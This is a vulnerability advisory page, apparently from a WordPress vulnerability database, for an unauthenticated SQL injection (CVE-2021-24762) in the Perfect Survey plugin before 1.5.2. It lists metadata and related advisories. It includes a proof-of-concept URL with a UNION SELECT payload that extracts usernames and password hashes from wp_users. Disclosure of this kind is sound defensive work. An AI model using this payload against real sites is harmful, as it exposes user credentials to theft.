Perfect Survey < 1.5.2 – Unauthenticated SQL Injection | CVE 2021-24762 | Plugin Vulnerabilities

Description

The plugin does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.

Proof of Concept

(The question_id must start with an existing post ID) https://example.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%20from%20wp_users

Affects Plugins

Fixed in 1.5.2

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

c1620905-7c31-4e62-80f5-1d9635be11ad

Timeline

Publicly Published

2021-10-05 (about 4 years ago)

Added

2021-12-29 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2024-01-08

Title

Barcode Scanner with Inventory & Order Manager < 1.5.2 - Unauthenticated SQL Injection via userToken

Published

2025-08-20

Title

Listeo-Core <= 1.9.32 - Authenticated (Subscriber+) SQL Injection

Published

2024-12-11

Title

SQL Chart Builder < 2.3.7 - Authenticated (Contributor+) SQL Injection

Published

2024-07-09

Title

WpStickyBar <= 2.1.0 - Unauthenticated SQLi

Published

2024-07-11

Title

Wallet for WooCommerce < 1.5.5 - Authenticated (Subscriber+) SQL Injection via 'search[value]'